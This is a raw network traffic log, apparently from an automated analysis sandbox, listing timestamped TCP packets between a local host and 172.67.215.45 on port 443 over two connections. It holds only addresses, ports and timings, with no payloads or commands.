Apr 17, 2024 08:39:25.613687992 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.613734961 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.613893986 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.613913059 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.613951921 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.613960981 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.613993883 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.614743948 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.614764929 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.614828110 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.614836931 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.614871025 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.615468025 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.615488052 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.615519047 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.615531921 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.615552902 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.615571022 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.616292953 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.616312981 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.616370916 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.616380930 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.616413116 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.616458893 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.616480112 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.616513014 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.616527081 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.616560936 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.616586924 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.617301941 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.617321014 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.617366076 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.617377043 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.617394924 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.617413998 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.618262053 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.618284941 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.618335962 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.618336916 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.618354082 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.618376970 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.618401051 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.618408918 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.618432045 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.618454933 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.619129896 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.619148970 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.619193077 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.619200945 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.619235039 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.619252920 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.619738102 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.619765043 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.619818926 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.619827032 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.619863033 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.620536089 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.620556116 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.620593071 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.620604038 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.620628119 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.620651960 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.620883942 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.620903015 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.620951891 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.620960951 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.620991945 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.621009111 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.621794939 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.621814966 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.621850967 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.621875048 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.621891022 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.621896029 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.621920109 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.621948957 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.621957064 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.621985912 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.622016907 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.622826099 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.622843981 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.622909069 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.622924089 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.622960091 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.623581886 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.623600960 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.623651981 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.623666048 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.623734951 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.624212027 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.624232054 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.624262094 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.624269962 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.624294996 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.624313116 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.624424934 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.624444962 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.624473095 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.624480963 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.624511003 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.624532938 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.625224113 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.625243902 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.625296116 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.625308037 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.625358105 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.626089096 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.626113892 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.626163960 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.626180887 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.626214981 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.626290083 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.626317978 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.626346111 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.626353025 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.626375914 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.626393080 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.627167940 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.627192020 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.627228022 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.627238989 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.627264977 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.627280951 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.627973080 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.627994061 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.628029108 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.628041029 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.628072023 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.628088951 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.628444910 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.628469944 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.628520966 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.628529072 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.628554106 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.628570080 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.628643036 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.628662109 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.628710032 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.628716946 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.628767967 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.629537106 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.629560947 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.629595041 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.629604101 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.629641056 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.629659891 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.630403996 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.630424976 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.630461931 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.630470991 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.630482912 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.630496025 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.630513906 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.630527973 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.630536079 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.630568981 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.631318092 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.631337881 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.631386042 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.631393909 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.631436110 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.632088900 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.632116079 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.632145882 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.632158041 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.632186890 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.632210016 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.632735014 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.632761002 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.632793903 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.632803917 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.632814884 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.632828951 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.632843971 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.632852077 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.632858038 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.632901907 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.633687973 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.633708000 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.633749962 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.633758068 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.633800030 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.634479046 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.634497881 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.634536982 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.634548903 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.634569883 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.634593964 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.634764910 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.634783030 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.634819031 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.634826899 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.634850025 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.634872913 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.635675907 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.635695934 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.635750055 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.635754108 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.635770082 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.635807991 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.635817051 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.635822058 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.635864019 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.636492968 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.636512041 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.636543989 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.636552095 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.636574984 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.636606932 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.637485981 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.637506008 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.637554884 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.637563944 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.637584925 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.637605906 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.637921095 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.637939930 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.637984991 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.637993097 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.638022900 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.638045073 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.638087988 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.638108015 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.638148069 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.638155937 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.638175011 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.638205051 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.638920069 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.638938904 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.638974905 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.638982058 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.639012098 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.639035940 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.639610052 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.639628887 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.639661074 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.639668941 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.639693975 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.639717102 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.639745951 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.639800072 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.639823914 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.639883995 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.639890909 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.640732050 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.640749931 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.640784025 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.640791893 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.640806913 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.640820980 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.640855074 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.640858889 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.641581059 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.641597986 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.641624928 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.641633987 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.641659975 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.642036915 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.642059088 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.642086029 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.642093897 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.642115116 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.642846107 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.642864943 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.642890930 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.642915010 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.642935991 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.642997026 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.643039942 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.649456024 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:26.198353052 CEST	49701	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:26.198421955 CEST	443	49701	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:26.198509932 CEST	49701	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:26.198873997 CEST	49701	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:26.198915005 CEST	443	49701	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:26.414132118 CEST	443	49701	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:26.417715073 CEST	49701	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:26.417754889 CEST	443	49701	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:26.669445038 CEST	443	49701	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:26.669502020 CEST	443	49701	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:26.669540882 CEST	443	49701	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:26.669569969 CEST	443	49701	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:26.669584990 CEST	49701	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:26.669612885 CEST	443	49701	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:26.669621944 CEST	443	49701	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:26.669640064 CEST	49701	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:26.669661999 CEST	49701	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:26.669682980 CEST	443	49701	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:26.669718027 CEST	443	49701	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:26.669759035 CEST	443	49701	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:26.669761896 CEST	49701	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:26.669770002 CEST	443	49701	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:26.669811010 CEST	443	49701	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:26.669812918 CEST	49701	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:26.669820070 CEST	443	49701	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:26.669862986 CEST	49701	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:26.669867992 CEST	443	49701	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:26.669874907 CEST	443	49701	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:26.669919014 CEST	49701	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:26.669926882 CEST	443	49701	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:26.669964075 CEST	443	49701	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:26.669998884 CEST	443	49701	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:26.670010090 CEST	49701	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:26.670017004 CEST	443	49701	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:26.670078039 CEST	443	49701	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:26.670114040 CEST	443	49701	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:26.670123100 CEST	49701	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:26.670131922 CEST	443	49701	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:26.670197010 CEST	443	49701	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:26.670232058 CEST	443	49701	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:26.670244932 CEST	49701	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:26.670253038 CEST	443	49701	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:26.670288086 CEST	49701	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:26.670295954 CEST	443	49701	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:26.670303106 CEST	443	49701	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:26.670342922 CEST	49701	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:26.670351028 CEST	443	49701	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:26.670391083 CEST	443	49701	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:26.670465946 CEST	443	49701	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:26.670502901 CEST	443	49701	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:26.670521021 CEST	49701	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:26.670530081 CEST	443	49701	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:26.670547009 CEST	49701	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:26.670562983 CEST	443	49701	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:26.670592070 CEST	443	49701	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:26.670618057 CEST	443	49701	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:26.670636892 CEST	49701	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:26.670645952 CEST	443	49701	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:26.670655966 CEST	49701	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:26.670676947 CEST	443	49701	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:26.670732021 CEST	443	49701	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:26.670794010 CEST	49701	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:26.670802116 CEST	443	49701	172.67.215.45	192.168.2.6
